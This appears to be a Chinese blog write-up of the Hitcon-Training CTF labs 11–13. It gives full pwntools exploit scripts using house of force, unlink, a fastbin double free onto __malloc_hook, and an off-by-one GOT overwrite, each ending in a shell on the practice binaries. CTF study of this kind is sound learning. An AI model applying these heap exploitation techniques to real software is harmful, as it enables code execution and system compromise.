美文网首页
Hitcon-Training之lab11-lab13

Hitcon-Training之lab11-lab13

作者: cceb9d5a8577 | 来源:发表于2018-09-02 22:22 被阅读170次

    lab11 bamboobox

    先来看一下这题的基本信息和漏洞点






    以上就是这道题目的漏洞点,大概有三种方法可以用来解题:

    方法一:利用house of force,修改top chunk大小再分配chunk,实现任意地址写,调用magic函数

    具体的原理可以看ctf-wiki中的介绍,不算难理解

    #encoding:utf-8
    from pwn import *
    context(os="linux", arch="amd64",log_level = "debug")
    
    ip =""
    if ip:
        p = remote(ip,20004)
    else:
        p = process("./bamboobox", aslr=0)
    
    elf = ELF("./bamboobox")
    
    def sl(s):
        p.sendline(s)
    def sd(s):
        p.send(s)
    def rc(timeout=0):
        if timeout == 0:
            return p.recv()
        else:
            return p.recv(timeout=timeout)
    def ru(s, timeout=0):
        if timeout == 0:
            return p.recvuntil(s)
        else:
            return p.recvuntil(s, timeout=timeout)
    def getshell():
        p.interactive()
    
    
    def show():
        ru("Your choice:")
        sd("1")
    def add(index,content):
        ru("Your choice:")
        sd("2")
        ru("Please enter the length of item name:")
        sd(str(index))
        ru("Please enter the name of item:")
        sd(content)
    def change(index,length,content):
        ru("Your choice:")
        sd("3")
        ru("Please enter the index of item:")
        sd(str(index))
        ru("Please enter the length of item name:")
        sd(str(length))
        ru("Please enter the new name of the item:")
        sd(content)
    
    def delete(index):
        ru("Your choice:")
        sd("4")
        ru("Please enter the index of item:")
        sd(str(index))
    def chunk(i):
        return 0x6020c8+i*0x10
    
    magic = 0x400d49
    atoi_got = elf.got["atoi"]
    #--------------------------------------------------------------------
    #方法一
    add(0x50,'aaaa')
    payload = 'a'*(0x50)+p64(0)+ p64(0xffffffffffffffff)
    change(0,len(payload),payload)
    # gdb.attach(p)
    # pause()
    heap_base = -(0x50 + 0x10)-(0x10+0x10)
    malloc_offset = heap_base -0x10
    add(malloc_offset,'bbbb')
    pause()
    add(0x10,p64(magic)*2)
    #print p.recv()
    pause()
    ru("Your choice:")
    sl("5")
    getshell()
    

    方法二:利用unlink操作,调用magic函数

    #方法二
    add(0x80,"a"*8)chunk0
    add(0x80,"b"*8)chunk1
    add(0x80,"c"*8)chunk2
    #需要注意,这三个chunk的大小都要保证不在fastbin的范围内
    #因为fastbin的size的p位默认为1,就无法进行unlink操作
    
    FD = 0x6020c8 - 3*8#在bss段,0x6020c8恰好存储了chunk0的指针
    BK = FD +8
    payload1 = p64(0)+p64(0x81)+p64(FD)+p64(BK)+"a"*0x60
    payload1 += p64(0x80)+p64(0x90)
    change(0,0x90,payload1)
    delete(1)
    #构造一个假的大小为0x80的fake_chunk,同时通过堆溢出
    #将chunk1的pre_size和size进行修改,使得size的p位为0
    #在free掉chunk1的时候,fake_chunk和chunk1就会进行合并
    #这时就会对fake_chunk进行unlink操作
    #这时就要对FD和BK进行精心构造,使得能够绕过unlink的检查
    #也就是使得:FD->bk = p  &&  BK->fd = p
    #在通过检查后,unlink会导致:*p=p-3*8=0x6020c8 - 3*8
    
    
    payload2 = p64(0)+p64(0)+p64(0x80)+p64(FD)+p64(0x80)+p64(atoi_got)
    change(0,len(payload2),payload2)
    change(1,0x10,p64(magic))
    #这时向chunk0中输入内容,实际上也就是向0x6020c8 - 3*8中输入内容
    #于是,就可以为所欲为地修改chunk_list,从而构造 UAF 
    ru("Your choice:")
    sl("5")
    getshell()
    #ps:这里有个玄学问题是,只能改chunk1的为atoi的got表,改chunk0就不行。。。很迷
    

    方法三,利用unlink,构造system(/bin/sh)

    #方法三
    #前面的内容和方法二一样,paylode2后就不一样
    payload2 = p64(0)+p64(0)+p64(0x80)+p64(atoi_got)
    #ps:是真的迷,如果用这种方法,改chunk0为atoi的got表就可以成功
    change(0,0x20,payload2)
    show()
    ru("0 : ")
    atoi = u64(ru("2 : ")[:6].ljust(8,"\x00"))
    print "atoi----->"+hex(atoi)
    
    #通过atoi的真实地址,去libc查找可以得到以下:
    offset_system = 0x0000000000045390
    offset_atoi = 0x0000000000036e80
    libc_base = atoi-offset_atoi
    system = libc_base+offset_system
    
    change(0,0x8,p64(system))
    sl("/bin/sh\x00")
    sl("5")
    
    getshell()
    

    lab12

    醉了,这题和网鼎杯半决赛的pwn3基本上一毛一样,就题目描述改了一下,当时没做出血亏orz,做法和那题一样:2018-网鼎杯 pwn(部分线上+线下)
    直接贴exp了:

    #encoding:utf-8
    from pwn import *
    context(os="linux", arch="amd64",log_level = "debug")
    
    ip =""
    if ip:
        p = remote(ip,20004)
    else:
        p = process("./secretgarden")#, aslr=0
    
    elf = ELF("./secretgarden")
    #libc = ELF("./libc-2.23.so")
    libc = elf.libc
    #-------------------------------------
    def sl(s):
        p.sendline(s)
    def sd(s):
        p.send(s)
    def rc(timeout=0):
        if timeout == 0:
            return p.recv()
        else:
            return p.recv(timeout=timeout)
    def ru(s, timeout=0):
        if timeout == 0:
            return p.recvuntil(s)
        else:
            return p.recvuntil(s, timeout=timeout)
    def debug(msg=''):
        gdb.attach(p,'')
        pause()
    def getshell():
        p.interactive()
    #-------------------------------------
    def create(size,name,color):
        ru("Your choice : ")
        sl("1")
        ru("Length of the name :")
        sl(str(size))
        ru("The name of flower :")
        sd(name)
        ru("The color of the flower :")
        sl(color)
    
    def visit():
        ru("Your choice : ")
        sl("2")
    
    def remote(index):
        ru("Your choice : ")
        sl("3")
        ru("Which flower do you want to remove from the garden:")
        sl(str(index))
    
    def clean():
        ru("Your choice : ")
        sl("4")
    
    create(0x98,"a"*8,"1234")
    create(0x68,"b"*8,"b"*8)
    create(0x68,"b"*8,"b"*8)
    create(0x20,"b"*8,"b"*8)
    remote(0)
    clean()
    create(0x98,"c"*8,"c"*8)
    visit()
    
    ru("c"*8)
    leak = u64(p.recv(6).ljust(8,"\x00"))
    libc_base = leak -0x58-0x10 -libc.symbols["__malloc_hook"]
    print "leak----->"+hex(leak)
    malloc_hook = libc_base +libc.symbols["__malloc_hook"]
    print "malloc_hook----->"+hex(malloc_hook)
    print "libc_base----->"+hex(libc_base)
    one_gadget = 0xf02a4 + libc_base
    
    
    remote(1)
    remote(2)
    remote(1)
    #debug()
    create(0x68,p64(malloc_hook-0x23),"b"*4)
    create(0x68,"b"*8,"b"*8)
    create(0x68,"b"*8,"b"*8)
    
    create(0x68,"a"*0x13+p64(one_gadget),"b"*4)
    
    remote(1)
    remote(1)
    
    getshell()
    

    lab13
    常规的保护机制


    这题应该算是一个off_by_one吧,只能溢出一个字节,改变下一个chunk的size,然后再free,然后再create,再进行操作
    主要的漏洞点在edit函数:


    主要的思路是:
    *create两个chunk,用chunk0溢出到chunk1 的size位,然后free掉chunk1
    *申请一个新的chunk2,使得chunk2落在chunk1size的部分从而修改指针
    *改free的got表为system的地址,然后使得chunk0 的内容为/bin/sh,接着free(chunk0)从而getshell
    exp如下:

    #encoding:utf-8
    from pwn import *
    context(os="linux", arch="amd64",log_level = "debug")
    
    ip =""
    if ip:
        p = remote(ip,20004)
    else:
        p = process("./heapcreator")#, aslr=0
    
    elf = ELF("./heapcreator")
    #libc = ELF("./libc-2.23.so")
    libc = elf.libc
    #-------------------------------------
    def sl(s):
        p.sendline(s)
    def sd(s):
        p.send(s)
    def rc(timeout=0):
        if timeout == 0:
            return p.recv()
        else:
            return p.recv(timeout=timeout)
    def ru(s, timeout=0):
        if timeout == 0:
            return p.recvuntil(s)
        else:
            return p.recvuntil(s, timeout=timeout)
    def debug(msg=''):
        gdb.attach(p,'')
        pause()
    def getshell():
        p.interactive()
    #-------------------------------------
    def create(size,contant):
        ru("Your choice :")
        sl("1")
        ru("Size of Heap : ")
        sl(str(size))
        ru("Content of heap:")
        sd(contant)
    
    def edit(Index,contant):
        ru("Your choice :")
        sl("2")
        ru("Index :")
        sl(str(Index))
        ru("Content of heap : ")
        sd(contant)
    
    def show(Index):
        ru("Your choice :")
        sl("3")
        ru("Index :")
        sl(str(Index))
    
    def delete(Index):
        ru("Your choice :")
        sl("4")
        ru("Index :")
        sl(str(Index))
    
    free_got = elf.got["free"]
    print "free_got------>"+hex(free_got)
    create(0x18,"a"*8)
    create(0x10,"b"*8)
    edit(0,"/bin/sh\x00"+"a"*0x10+p64(0x41))
    #debug()
    delete(1)
    
    create(0x30,p64(0)*4+p64(0x30)+p64(free_got))
    show(1)
    ru("Content : ")
    free = u64(p.recv(6).ljust(8,"\x00"))
    libc_base = free- libc.symbols["free"]
    system = libc_base+libc.symbols["system"]
    print "free------>"+hex(free)
    print "libc_base------>"+hex(libc_base)
    edit(1,p64(system))
    delete(0)
    getshell()
    #debug()
    

    相关文章

      网友评论

          本文标题:Hitcon-Training之lab11-lab13

          本文链接:https://www.haomeiwen.com/subject/gqlvwftx.html